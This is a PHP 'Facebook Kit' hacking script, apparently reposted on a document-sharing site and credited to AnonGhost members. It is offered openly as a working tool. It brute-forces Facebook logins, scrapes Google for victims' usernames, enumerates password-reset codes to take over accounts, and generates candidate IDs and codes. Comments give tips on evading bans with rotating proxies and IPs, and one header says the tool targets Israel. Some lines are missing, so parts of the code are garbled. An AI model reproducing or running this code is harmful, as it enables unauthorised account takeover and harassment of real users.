PHP Facebook Password Bruteforce Script With Video

1.
PHP Facebook Password Bruteforce Script With Video ★ReskayLeaks★

2.
3.
4. <?php
5. session_start();
6.
7. error_reporting(E_ERROR | E_PARSE);
8. @ini_set("max_execution_time",0);
9. @set_time_limit(0); #No Fx in SafeMode
10. @ignore_user_abort(TRUE);
11. @set_magic_quotes_runtime(0);
12. // Use your mind to escape Facebook Security \!/
13. // Don't Allow Cookies in your browser (Use priv8 browsing)
14. // Change your IP and DNS each 2 seconds and your Job will
be Great °_°
15. // GreetZ To : All AnonGhost MemberZ \!/
16. // You can edit this script but don't forget to mention the
authors °_°
17. // Tutorial Video:
https://www.youtube.com/watch?v=66a_wOwOT48
18.
19. echo '
20. <html>
21. <title>Facebook Kit</title><link rel="shortcut icon"
href="http://www14.0zz0.com/2014/06/04/21/396554394.png"
type="image/x-icon" />
22. <body style="background-color:black;">
23. <style type="text/css">
24. body {
25. background:
26. url("http://i.imgur.com/hg21xZ9.png") repeat ,
27. url("http://www.albertpalacci.org/wp-
content/uploads/2014/08/fb-relationships-full.png") no-repeat
center top,top left,top right;
28. background-color: #000000;
29. }
30. a{
31. text-decoration:none;
32. border:1px solid #12549c;
33. border-radius:5px;
34. background-color:black;
35. color:white;
36. font-family:Arial;
37. font-size:17;
38. box-shadow: 0px 0px 12px #21a0ed;
39. }
40. #r{
41. border-bottom:1px solid #12549c;
42. }
43. </style>
44.
45. <head>
46. </body>
47. </html>
48. <center><font color="white" face="Orbitron" size="7"
align="center">Facebook Kit Hacker v 1.2</font></center>
49. ';
50.
51. echo
'<center>'.base64_decode("PGltZyBzcmM9Imh0dHA6Ly9oYWNrLXRvdXQuY29t
L3dwLWNvbnRlbnQvdXBsb2Fkcy8yMDE0LzAyL0ZhY2Vib29rLnBuZyIvPg==").'</
center>';
52.
53. echo '<center><font color="#007700" face="Tahoma, Geneva,
sans-serif" style="font-size: 8pt">';
54.
55. echo '</font></b></div><br></center>';
56.
57. ?>
58. <div id="det" align="center">
59.
60. </div>
61. </center>
62. <div id="r" align="center">
63. <a href="<?php echo htmlentities($_SERVER['PHP_SELF']);
?>"> Home </a></font>
64. <a href="?action=baipas"> FB Brute
Force </a></font>
65. <a href="?action=brut"> FB Ghost
Catcher </a></font>
66. <a href="?action=crack"> FB Reset Code </a></font>
67. <a href="?action=passgen"> Reset Code
Generator </a></font>
68. <a href="?action=idgen"> FB ID
Generator </a></font>
69. <a href="?action=graph"> FB ID Checker </a></font>
70. <audio autoplay> <source
src="http://www.soundescapestudios.com/SESAudio/SES%20Site%20Sound
s/Beeps/Beeps-short-01.wav" type="audio/mpeg"></audio>
71. </div><br>
72. <?php
73.
74. if(isset($_GET['action']) && $_GET['action'] == 'idgen'){
75. @error_reporting(0);
76. function getRandomString() { //Facebook Email Admin Page
Default Lenght is 13 so don't change it xD wkwkwkkw !
77. $validCharacters = "0123456789"; // Here you are free to
choose how to randomize your words ^_^
78. $validCharNumber = strlen($validCharacters);
79. $len = 10;
80. $result = "";
81.
82. for ($i = 0; $i < $len; $i++) {
83. $index = mt_rand(0, $validCharNumber - 1);
84. $result .= $validCharacters[$index];
85. }
86.
87. return $result;
88. }
89.
90. echo'
91. <style>
92. textarea {
93. resize:none;
94. color: #1975FF ;
95. border:1px solid #1975FF ;
96. border-left: 4px solid #1975FF ;
97. }
98. input {
99. color: ##33CCFF;
100. border:1px dotted #33CCFF;
101. }
102. </style>
103. <p><center><font face="impact" color="White"
size="4">Facebook ID Generator
104. </center><center></font><br>
105. <title>Facebook ID Generator</title>
106. <form method="post">
107. <font color="white">Number Of ID : <br><input type="text"
name="nr"><br><br></font>
108. <input type="submit" value="Generate" name="fbmailgen">
109. </form><br>';
110.
111. $len = $_POST['len'];
112. $nr = $_POST['nr'];
113. if ($_POST['fbmailgen']) {
114. echo"<textarea style='resize:none;' class='area' cols='45'
rows='10'>";
115. for ($x=0; $x < $nr ; $x++){
116. echo "10000" . getRandomString() . "\r\n";
117. }
118. echo "</textarea><br>";
119. echo "
120. <br>
121. <b>
122. </b>
123. <br>
124. ";
125. }
126. }
127. if(isset($_GET['action']) && $_GET['action'] == 'passgen'){
128. @error_reporting(0);
129. function getRandomString() { //Facebook Email Admin Page
Default Lenght is 13 so don't change it xD wkwkwkkw !
130. $validCharacters = "0123456789"; // Here you are free to
choose how to randomize your words ^_^
131. $validCharNumber = strlen($validCharacters);
132. $len = 6;
133. $result = "";
134.
135. for ($i = 0; $i < $len; $i++) {
136. $index = mt_rand(0, $validCharNumber - 1);
137. $result .= $validCharacters[$index];
138. }
139.
140. return $result;
141. }
142.
143. echo'
144. <style>
145. textarea {
146. resize:none;
147. color: #1975FF ;
150. }
151. input {
154. }
155. </style>
156. <p><center><font face="impact" color="White"
size="4">Facebook Reset Code Generator</font>
157. </center><center><br>
158. <title>Facebook Reset Code Generator</title>
159. <form method="post">
160. <font color="white">Number Of Reset Codes :
<input type="text" name="nr"><br><br></font>
161. <input type="submit" value="Generate" name="fbmailgen">
162. </form><br>';
163. $len = $_POST['len'];
164. $nr = $_POST['nr'];
165. if ($_POST['fbmailgen']) {
166. echo"<textarea style='resize:none;' class='area' cols='20'
rows='10'>";
167. for ($x=0; $x < $nr ; $x++){
168. echo getRandomString() . "\r\n";
169. }
170. echo "</textarea><br>";
171. echo "
172. <br>
173. <b>
174. </b>
175. <br>
176. ";
177. }
178.
179. }
180.
181. if(isset($_GET['action']) && $_GET['action'] == 'brut'){
182.
183. echo"
184. <style>
185. textarea {
186. resize:none;
187. color: #1975FF ;
190. }
191. input {
194. }
195. select {
198. }
199. </style>
200. <title>F4c3b00k Gh0sT</title>
201. <form method='POST'>
202. <center><font face='impact' size='4' color='white'>Facebook
Gh0sT Catcher by n0name-hax0r & Mauritania
Attacker</font><br></center><br>
203. <center>
204. <center><font face='arial' size='1'
color='red'>Server</font><br></center>
205. <select name=country><br><br>
206. <option value='Choose Country'>Choose The Country</option>
207. <option value='site:fr-fr.facebook.com/'>France</option>
208. <option value='site:ar-ar.facebook.com/'>Arab
Countries</option>
209. <option value='site:es-es.facebook.com/'>Spain</option>
210. <option value='site:tr-tr.facebook.com/'>Turkey</option>
211. <option value='site:de-de.facebook.com/'>Germany</option>
212. <option value='site:pt-pt.facebook.com/'>Portugual</option>
213. <option value='site:it-it.facebook.com/'>Italy</option>
214. <option value='site:hi-in.facebook.com/'>India</option>
215. <option value='site:sr-rs.facebook.com/'>Serbia</option>
216. <option value='site:el-gr.facebook.com/'>Greece</option>
217. <option value='site:he-il.facebook.com/'>Israel</option>
218. <option value='site:id-id.facebook.com/'>Indonesia</option>
219. <option value='site:ru-ru.facebook.com/'>Russia</option>
220. <option value='site:nl-
nl.facebook.com/'>Netherlands</option>
221. <option value='site:bg-bg.facebook.com/'>Bulgaria</option>
222. <option value='site:mk-mk.facebook.com/'>Macedonia</option>
223. <option value='site:uk-ua.facebook.com/'>Ukraine</option>
224. <option value='site:zh-cn.facebook.com/'>China</option>
225. </select><br><br>
226. </center>
227. <center>
228. <input type='text' name='victim' placeholder='Victim
Name'><br><br>
229. <textarea name='pass' style='resize:none;' rows='10'
cols='20' placeholder='Password List'></textarea><br><br>
230. <input type='submit' name='start' value='~~Start
Catching~~'></center><br><br>
231. </form>
232. <center>
233. <font color='white'>(Use this tool using proxy and change
the proxy every 1-2 mins to avoid getting banned from
google)</font><br><br>
234. ";
235. set_time_limit(0);
236. ini_set('memory_limit', '64M');
237. header('Content-Type: text/html; charset=UTF-8');
238. function letItBy(){ ob_flush(); flush(); }
239.
240. $country = $_POST['country'];
241. $victim = $_POST['victim'];
242. $bing = "{$country}"."{$victim}";
243. $password = explode("\r\n",$_POST['pass']);
244.
245. //Function that gets google urls
246.
247. function google_that($query, $page=1)
248. {
249. $resultPerPage=8;
250. $start = $page*$resultPerPage;
251. $url =
"http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&r
sz={$resultPerPage}&start={$start}&q=" . urlencode($query);
252. $resultFromGoogle = json_decode( http_get($url, true)
,true);
253. if(isset($resultFromGoogle['responseStatus'])) {
254. if($resultFromGoogle['responseStatus'] != '200') return
false;
255. if(sizeof($resultFromGoogle['responseData']['results']) ==
0) return false;
256. else return $resultFromGoogle['responseData']['results'];
257. }
258. else
259. die('The function <b>' . __FUNCTION__ . '</b> Kill me :(
<br>' . $url );
260. }
261. function http_get($url, $safemode = false){
262. if($safemode === true) sleep(1);
263. $im = curl_init($url);
264. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
265. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
266. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
267. curl_setopt($im, CURLOPT_HEADER, 0);
268. return curl_exec($im);
269. curl_close();
270. }
271. function brute($user,$pass){
272. $ch = curl_init();
273. curl_setopt($ch, CURLOPT_URL,
"https://m.facebook.com/login.php?login_attempt=1");
274. curl_setopt($ch, CURLOPT_HEADER, 0);
275. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
276. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
277. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
278. curl_setopt($ch, CURLOPT_POSTFIELDS,
"email={$user}&pass={$pass}");
279. curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
280. $login = curl_exec($ch);
281. //print_r($login);
282. $check = (eregi('class="s t i u"',$login)) ? true:false;
283. if($check == true){
284. echo "<p align='center' dir='ltr'><font face='Arial Black'
size='2'>Not the right one :( || Username : <font
color='red'>$user</font> Password : <font
color='red'>$pass</font></font></p>";
285. }else{
size='2'>This Password Seems Working !Try It ^_^ || Username:
<font color='green'>$user</font> Password : <font
color='green'>$pass</font></font></p>";
287. }
288. }
289.
290.
291. if(isset($_POST['start'])){
292.
293. letItBy();
294. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
295. $googleResult = google_that($bing, $googlePage);
296. if(!$googleResult) {
297. echo 'Finished scanning.';
298.
299. break;
300. }
301.
302. // Gets the username of victim
303.
304. for($victim = 0; $victim < sizeof($googleResult);
$victim++){
305.
306. $result = $googleResult[$victim]['unescapedUrl'];
307. if($country == "site:fr-fr.facebook.com/"){
308. $rsss = str_replace("https://fr-
fr.facebook.com/","",$result);
309. }
310. elseif($country == "site:ar-ar.facebook.com/"){
311. $rsss = str_replace("https://ar-
ar.facebook.com/","",$result);
312. }
313. elseif($country == "site:es-es.facebook.com/"){
314. $rsss = str_replace("https://es-
es.facebook.com/","",$result);
315. }
316. elseif($country == "site:tr-tr.facebook.com/"){
317. $rsss = str_replace("https://tr-
tr.facebook.com/","",$result);
318. }
319. elseif($country == "site:de-de.facebook.com/"){
320. $rsss = str_replace("https://de-
de.facebook.com/","",$result);
321. }
322. elseif($country == "site:pt-pt.facebook.com/"){
323. $rsss = str_replace("https://pt-
pt.facebook.com/","",$result);
324. }
325. elseif($country == "site:it-it.facebook.com/"){
326. $rsss = str_replace("https://it-
it.facebook.com/","",$result);
327. }
328. elseif($country == "site:hi-in.facebook.com/"){
329. $rsss = str_replace("https://hi-
in.facebook.com/","",$result);
330. }
331. elseif($country == "site:zh-cn.facebook.com/"){
332. $rsss = str_replace("https://zh-
cn.facebook.com/","",$result);
333. }
334. elseif($country == "site:sr-rs.facebook.com/"){
335. $rsss = str_replace("https://sr-
rs.facebook.com/","",$result);
336. }
337. elseif($country == "site:el-gr.facebook.com/"){
338. $rsss = str_replace("https://el-
gr.facebook.com/","",$result);
339. }
340. elseif($country == "site:he-il.facebook.com/"){
341. $rsss = str_replace("https://he-
il.facebook.com/","",$result);
342. }
343. elseif($country == "site:id-id.facebook.com/"){
344. $rsss = str_replace("https://id-
id.facebook.com/","",$result);
345. }
346. elseif($country == "site:ru-ru.facebook.com/"){
347. $rsss = str_replace("https://ru-
ru.facebook.com/","",$result);
348. }
349. elseif($country == "site:nl-nl.facebook.com/"){
350. $rsss = str_replace("https://nl-
nl.facebook.com/","",$result);
351. }
352. elseif($country == "site:bg-bg.facebook.com/"){
353. $rsss = str_replace("https://bg-
bg.facebook.com/","",$result);
354. }
355. elseif($country == "site:mk-mk.facebook.com/"){
356. $rsss = str_replace("https://mk-
mk.facebook.com/","",$result);
357. }
358. elseif($country == "site:uk-ua.facebook.com/"){
359. $rsss = str_replace("https://uk-
ua.facebook.com/","",$result);
360. }
361. $users = explode("?", $rsss);
362. $users = $users[0];
363.
364. //Bruteforce Function
365.
366. foreach($password as $pass)
367. {
368.
369. echo brute($users,$pass);
370. }
371. }
372. }
373. }
374. @system("del cookie.txt"); //Delete cookies command for win
server.
375. @system("rm cookie.txt"); // Delete cookies command for
linux server.
376. }
377. if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
378.
379. ob_start();
380. @set_time_limit(0);
381. #################################################
382. #---------------------------------------------- #
383. # Facebook Brute Force 2014 #
384. #Coded by : Mauritania Attacker&Noname-Haxor #
385. #Greetz : All AnonGhost Members #
386. #This Tool Is For Erasing Israel in Fb #
387. # --------------------------------------------- #
388. #################################################
389.
390. echo "
391. <head>
392. <link rel='icon' type='image/ico'
href='http://media.stateofq.com/photologue/photos/cache/facebook%2
0favicon_thumbnail.png'/>
393. <form method='POST'>
394. <title>Facebook Brute Force 2014</title>
395. </head>
396. <style>
397. textarea {
398. resize:none;
399. color: #1975FF ;
402. }
403. input {
406. }
407. </style>";
408.
409. echo "
410. <body text='#FFFFFF' >
411. <center><font color='White' size=4 face='impact' >Facebook
Multi-Account BruteForce by Mauritania Attacker&Noname-Haxor
</center></font><br>
412. <p dir='ltr' align='center'>
413. <textarea cols='22' class='area' placeholder='Username'
rows='14' name='username'></textarea>
414. <textarea cols='22' class='area' placeholder='Password'
rows='14' name='password'></textarea><br>
415. <br>
416. <input type='submit' name='scan' value='Start
BruteForce'><br></p>";
417. if(isset($_POST['scan'])){
418. #To Put Proxy SOCKS V5
419. //curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
420. //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
421. function brute($user,$pass){
"https://m.facebook.com/login.php?login_attempt=1");
427. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
428. curl_setopt($ch, CURLOPT_POSTFIELDS,
"email={$user}&pass={$pass}");
430. $login = curl_exec($ch);
431. //print_r($login);
432. $check = (eregi('class="s t i u"',$login)) ? true:false;
433. if($check == true){
size='2'>Not the right one :( || Username : <font
color='red'>$user</font> Password : <font
color='red'>$pass</font></font></p>";
435. }else{
size='2'>This Password Seems Working !Try It ^_^ || Username:
<font color='green'>$user</font> Password : <font
color='green'>$pass</font></font></p>";
437. }
438. }
439.
440.
441.
442.
443. $username = explode("\n", $_POST['username']);
444. $password = explode("\n", $_POST['password']);
445.
446.
447. foreach($username as $users) {
448. $users = @trim($users);
449. foreach($password as $pass) {
450. $pass = @trim($pass);
451. echo brute($users,$pass);
452. }
453.
454. }
server.
linux server.
457.
458. }
459. echo"<br>
460. <br>
461. <br>
462. <br>
463. ";
464. }
465. if(isset($_GET['action']) && $_GET['action'] == 'crack'){
466.
467.
468. /*
469. [+] Facebook Code Security Cracker
470. [+] Coded By : Mauritania Attacker
471. [+] GreetZ : All AnonGhost MemberZ
472. [+] FuCk Priv888888888888888888888
473.
474.
475. ~~HACKING IS ART OF EXPLOITATION~~
476.
477. <3 <3 <3 I'm not educated , I hate school , Hacking is my
life xD !!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3
478.
479. // How to use: Restore your victim account and better choose
the email option :p , and the rest is to use your mind \!/
480. I suggest you to use an auto rotating proxy after each 2
minutes so you won't get banned :D , i've bypassed already the
captcha
481. security and cookies ,so facebook won't let you try many
attempts so proxy is the solution !
482.
483. you still can add a proxy socks v5 option in Curl only two
lines :
484.
485. curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
486. curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
487.
488. You can edit my script and try to develop it more if you
have some ideas you are free , but don't forget the Copyright
wkwkwkwkwkwk xd <3
489.
490. Sharing is Caring \!/
491.
492. Sorry my english is bad and i'm lazy xD !
493. */
494.
496. echo "<form method='POST'>
497. <title>Facebook Code Security Cracker > By Mauritania
Attacker</title>
498. <style>
499. /* Rounded Corners */
500. #ghost {
501. resize:none;
502. color: #1975FF ;
505. height: 250px;
506. width: 200px; }
507. input {
508. /* INPUTS */
509. border: 1px solid #12549c;
510. }
511. </style>
512. <center><font color='White' size='4' face='impact'>Facebook
0day Exploit Reset Code Priv8 By Mauritania Attacker</center><br>
513. <center><input type='text' name='target'
placeholder='Victim'></center><br>
514. <center><textarea cols='10' rows='6' id='ghost'
placeholder='Reset Codes' name='code'></textarea><br></center>
515. <p><center><input type='submit' value='Crack Reset Code'
name='scan'><br><br></center></p>
516. </form>";
517. $target=$_POST['target'];
518. $user = explode("\r\n", $_POST['code']);
519. if($_POST['scan'])
520. {
521. foreach($user as $code)
522. {
523. // Curl Function ^_^
"https://m.facebook.com/recover/password?u={$target}&n={$code}");
528. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
// change this with your real useragent infos (browser & version)
531.
532. $check = curl_exec($ch);
533. if(eregi("password_new", $check)) //Keyword Good Response
^_^
534. {
535. echo "<font face='Tahoma' size='2' color='green'>{$code} =>
Facebook Confirmation Code Found ^_^ </font><br>";
536. }
537. else
538. {
539. echo "<font face='Tahoma' size='2' color='red'>{$code} =>
Incorrect Code Trying More...</font><br>";
540. }
541. curl_close($ch);
542. }
543. }
server.
linux server.
546. }
547.
548. echo "</center><center>";
549.
550.
551.
552.
553. ob_end_flush();
554.
555.
556. echo '<center><font color="red" face="arial" size="2"
align="">Coded By Mauritania Attacker & n0name-
hax0r</font></center>';
557.
558. if(isset($_GET['action']) && $_GET['action'] == 'graph'){
559.
560.
561.
563. echo "<form method='POST'>
564. <title>Facebook ID's Checker By Mauritania Attacker</title>
565. <style>
566. /* Rounded Corners */
567. #ghost {
568. resize:none;
569. color: #1975FF ;
572. height: 250px;
573. width: 200px; }
574. input {
575. /* INPUTS */
576. border: 1px solid #12549c;
577. }
578. </style>
579. <center><font color='White' size='4' face='impact'>Facebook
ID's Checker By Mauritania Attacker</center><br>
580. <center><textarea cols='10' rows='6' id='ghost'
placeholder='ID Here ^^' name='code'></textarea><br></center>
581. <p><center><input type='submit' value='Check Now'
name='scan'><br><br></center></p>
582. </form>";
583.
584. $user = explode("\r\n", $_POST['code']);
585. if($_POST['scan'])
586. {
587. foreach($user as $code)
588. {
589. // Curl Function ^_^
"https://graph.facebook.com/{$code}");
594. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
597.
598. $check = curl_exec($ch);
599. if(eregi("username", $check)) //Keyword Good Response ^_^
600. {
601. echo "<font face='Tahoma' size='2' color='green'>{$code} =>
ID IS CORRECT ^_^ </font><br>";
602. }
603. else
604. {
605. echo "<font face='Tahoma' size='2' color='red'>{$code} => ID
IS FALSE :(...</font><br>";
606. }
607. curl_close($ch);
608. }
609. }
server.
linux server.
612. }
613.
614. echo "</center><center>";
615.
616. ob_end_flush();
617.
618. echo '<center><font color="red" face="arial" size="2"
align="">Coded By Mauritania Attacker & n0name-
hax0r</font></center>';
619. ?>

PHP Facebook Password Bruteforce Script With Video

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

PHP Facebook Password Bruteforce Script With Video

Uploaded by

Copyright:

Available Formats

1.

PHP Facebook Password Bruteforce Script With Video ★ReskayLeaks★

You might also like